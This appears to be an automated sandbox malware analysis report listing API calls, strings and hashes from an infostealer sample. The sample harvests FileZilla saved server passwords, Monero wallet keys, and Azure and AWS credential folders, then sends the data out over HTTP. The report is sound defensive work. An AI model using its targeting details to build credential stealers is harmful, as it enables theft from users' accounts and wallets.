                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    Function 00640250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006399EC
                      • Part of subcall function 006399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00639A11
                      • Part of subcall function 006399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00639A31
                      • Part of subcall function 006399C0: ReadFile.KERNEL32(000000FF,?,00000000,0063148F,00000000), ref: 00639A5A
                      • Part of subcall function 006399C0: LocalFree.KERNEL32(0063148F), ref: 00639A90
                      • Part of subcall function 006399C0: CloseHandle.KERNEL32(000000FF), ref: 00639A9A
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00650DBA,00650DB7,00650DB6,00650DB3), ref: 00640362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00640369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00640385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 006403CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 006403DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00640419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00640463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 0064051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 00640532
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 0064054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00640562
                    • lstrcat.KERNEL32(?,profile: null), ref: 00640571
                    • lstrcat.KERNEL32(?,url: ), ref: 00640580
                    • lstrcat.KERNEL32(?,00000000), ref: 00640593
                    • lstrcat.KERNEL32(?,00651678), ref: 006405A2
                    • lstrcat.KERNEL32(?,00000000), ref: 006405B5
                    • lstrcat.KERNEL32(?,0065167C), ref: 006405C4
                    • lstrcat.KERNEL32(?,login: ), ref: 006405D3
                    • lstrcat.KERNEL32(?,00000000), ref: 006405E6
                    • lstrcat.KERNEL32(?,00651688), ref: 006405F5
                    • lstrcat.KERNEL32(?,password: ), ref: 00640604
                    • lstrcat.KERNEL32(?,00000000), ref: 00640617
                    • lstrcat.KERNEL32(?,00651698), ref: 00640626
                    • lstrcat.KERNEL32(?,0065169C), ref: 00640635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00650DB2), ref: 0064068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    • Opcode ID: 7d6e7b4265c823ca3f5c6c9ef72c4ed871b7cf208a72f0ca48539fdbf377dcd6
                    • Instruction ID: c0ad03641eb3afb201c0b9537d32586046a0490d8b7a65fd7848e8ef1e683a9e
                    • Opcode Fuzzy Hash: 7d6e7b4265c823ca3f5c6c9ef72c4ed871b7cf208a72f0ca48539fdbf377dcd6
                    • Instruction Fuzzy Hash: C8D14E71940108AFEB48EBE0DD9AEEE733AFF54301F44451CF506A6095DE34AA4ACB66
                    Function 00635960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                      • Part of subcall function 006347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00634839
                      • Part of subcall function 006347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00634849
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006359F8
                    • StrCmpCA.SHLWAPI(?,014507B0), ref: 00635A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00635B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01450630,00000000,?,0144B7F0,00000000,?,00651A1C), ref: 00635E71
                    • lstrlen.KERNEL32(00000000), ref: 00635E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00635E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00635E9A
                    • lstrlen.KERNEL32(00000000), ref: 00635EAF
                    • lstrlen.KERNEL32(00000000), ref: 00635ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00635EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 00635F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00635F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00635F4C
                    • InternetCloseHandle.WININET(00000000), ref: 00635FB0
                    • InternetCloseHandle.WININET(00000000), ref: 00635FBD
                    • HttpOpenRequestA.WININET(00000000,01450760,?,0144FDD8,00000000,00000000,00400100,00000000), ref: 00635BF8
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • InternetCloseHandle.WININET(00000000), ref: 00635FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 874700897-2180234286
                    • Opcode ID: 05ac3d59d9946250bf1a5654278725c7f31e2e78dc39a5c6dc83a637349ad9c5
                    • Instruction ID: b11f4cdf0a59af8c85802b71eb2af14cddc69e51243210cdf9046b1c4c212285
                    • Opcode Fuzzy Hash: 05ac3d59d9946250bf1a5654278725c7f31e2e78dc39a5c6dc83a637349ad9c5
                    • Instruction Fuzzy Hash: BA12FC71860118BEEB59EBA0DC95FEEB37AFF54700F40419DB10A62091EF706A49CF69
                    Function 0063CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 00648B60: GetSystemTime.KERNEL32(00650E1A,0144B8B0,006505AE,?,?,006313F9,?,0000001A,00650E1A,00000000,?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 00648B86
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0063CF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0063D0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0063D0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D208
                    • lstrcat.KERNEL32(?,00651478), ref: 0063D217
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D22A
                    • lstrcat.KERNEL32(?,0065147C), ref: 0063D239
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D24C
                    • lstrcat.KERNEL32(?,00651480), ref: 0063D25B
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D26E
                    • lstrcat.KERNEL32(?,00651484), ref: 0063D27D
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D290
                    • lstrcat.KERNEL32(?,00651488), ref: 0063D29F
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D2B2
                    • lstrcat.KERNEL32(?,0065148C), ref: 0063D2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 0063D2D4
                    • lstrcat.KERNEL32(?,00651490), ref: 0063D2E3
                      • Part of subcall function 0064A820: lstrlen.KERNEL32(00634F05,?,?,00634F05,00650DDE), ref: 0064A82B
                      • Part of subcall function 0064A820: lstrcpy.KERNEL32(00650DDE,00000000), ref: 0064A885
                    • lstrlen.KERNEL32(?), ref: 0063D32A
                    • lstrlen.KERNEL32(?), ref: 0063D339
                      • Part of subcall function 0064AA70: StrCmpCA.SHLWAPI(0144A068,0063A7A7,?,0063A7A7,0144A068), ref: 0064AA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 0063D3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    • Opcode ID: 935d73809c21ee889082d48280861ec04bb6c8c754814906e1a5579160eef635
                    • Instruction ID: ccec92ec61f21ee1ca6c342c247d05dee67175b94c6f8615e00aa314c4b633ca
                    • Opcode Fuzzy Hash: 935d73809c21ee889082d48280861ec04bb6c8c754814906e1a5579160eef635
                    • Instruction Fuzzy Hash: 29E15E71850108BBDB48EBE0DD9AEEE737AFF54301F104158F506A6091DE35AE49CBA6
                    Function 0063C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0144DF28,00000000,?,0065144C,00000000,?,?), ref: 0063CA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0063CA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0063CA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0063CAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0063CAD9
                    • StrStrA.SHLWAPI(?,0144DE38,00650B52), ref: 0063CAF7
                    • StrStrA.SHLWAPI(00000000,0144E018), ref: 0063CB1E
                    • StrStrA.SHLWAPI(?,0144E8E0,00000000,?,00651458,00000000,?,00000000,00000000,?,0144A078,00000000,?,00651454,00000000,?), ref: 0063CCA2
                    • StrStrA.SHLWAPI(00000000,0144E900), ref: 0063CCB9
                      • Part of subcall function 0063C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0063C871
                      • Part of subcall function 0063C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0063C87C
                    • StrStrA.SHLWAPI(?,0144E900,00000000,?,0065145C,00000000,?,00000000,0144A098), ref: 0063CD5A
                    • StrStrA.SHLWAPI(00000000,01449E28), ref: 0063CD71
                      • Part of subcall function 0063C820: lstrcat.KERNEL32(?,00650B46), ref: 0063C943
                      • Part of subcall function 0063C820: lstrcat.KERNEL32(?,00650B47), ref: 0063C957
                      • Part of subcall function 0063C820: lstrcat.KERNEL32(?,00650B4E), ref: 0063C978
                    • lstrlen.KERNEL32(00000000), ref: 0063CE44
                    • CloseHandle.KERNEL32(00000000), ref: 0063CE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    • Opcode ID: 89d0d30f16a6364943c5c9d908dbf9345ffcc8f4c7d4783f435b188383f8f171
                    • Instruction ID: 1d89abe3d897fc94fc57956871f8dd0df7ff0405a703a06d07f3d061569b8b03
                    • Opcode Fuzzy Hash: 89d0d30f16a6364943c5c9d908dbf9345ffcc8f4c7d4783f435b188383f8f171
                    • Instruction Fuzzy Hash: 30E1E971850108BEEB58EBE0DC95FEEB77AFF54300F40415DF50666191EE306A8ACB6A
                    Function 00648320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • RegOpenKeyExA.ADVAPI32(00000000,0144C048,00000000,00020019,00000000,006505B6), ref: 006483A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00648426
                    • wsprintfA.USER32 ref: 00648459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0064847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0064848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00648499
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: 60c731dfa11d2fe8ba98ce4fe0c15c2781ee7bf261aa2a924e874942303735b3
                    • Instruction ID: 8f7bd391ea94e18b5a6b368bce6062067187cf90956b705ab28207df63a8f026
                    • Opcode Fuzzy Hash: 60c731dfa11d2fe8ba98ce4fe0c15c2781ee7bf261aa2a924e874942303735b3
                    • Instruction Fuzzy Hash: 4C810B71951118AFEB68DB94CC95FEEB7B9FF48700F008298E109A6180DF71AB85CF95
                    Function 00644D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00648DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00648E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00644DB0
                    • lstrcat.KERNEL32(?,\.azure\), ref: 00644DCD
                      • Part of subcall function 00644910: wsprintfA.USER32 ref: 0064492C
                      • Part of subcall function 00644910: FindFirstFileA.KERNEL32(?,?), ref: 00644943
                    • lstrcat.KERNEL32(?,00000000), ref: 00644E3C
                    • lstrcat.KERNEL32(?,\.aws\), ref: 00644E59
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,00650FDC), ref: 00644971
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,00650FE0), ref: 00644987
                      • Part of subcall function 00644910: FindNextFileA.KERNEL32(000000FF,?), ref: 00644B7D
                      • Part of subcall function 00644910: FindClose.KERNEL32(000000FF), ref: 00644B92
                    • lstrcat.KERNEL32(?,00000000), ref: 00644EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00644EE5
                      • Part of subcall function 00644910: wsprintfA.USER32 ref: 006449B0
                      • Part of subcall function 00644910: StrCmpCA.SHLWAPI(?,006508D2), ref: 006449C5
                      • Part of subcall function 00644910: wsprintfA.USER32 ref: 006449E2
                      • Part of subcall function 00644910: PathMatchSpecA.SHLWAPI(?,?), ref: 00644A1E
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,01450700), ref: 00644A4A
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,00650FF8), ref: 00644A5C
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,?), ref: 00644A70
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,00650FFC), ref: 00644A82
                      • Part of subcall function 00644910: lstrcat.KERNEL32(?,?), ref: 00644A96
                      • Part of subcall function 00644910: CopyFileA.KERNEL32(?,?,00000001), ref: 00644AAC
                      • Part of subcall function 00644910: DeleteFileA.KERNEL32(?), ref: 00644B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: 7c5f9da36c351089d07c542df87d97c1abf862f284f4eb0dd52117be9c1aa1b1
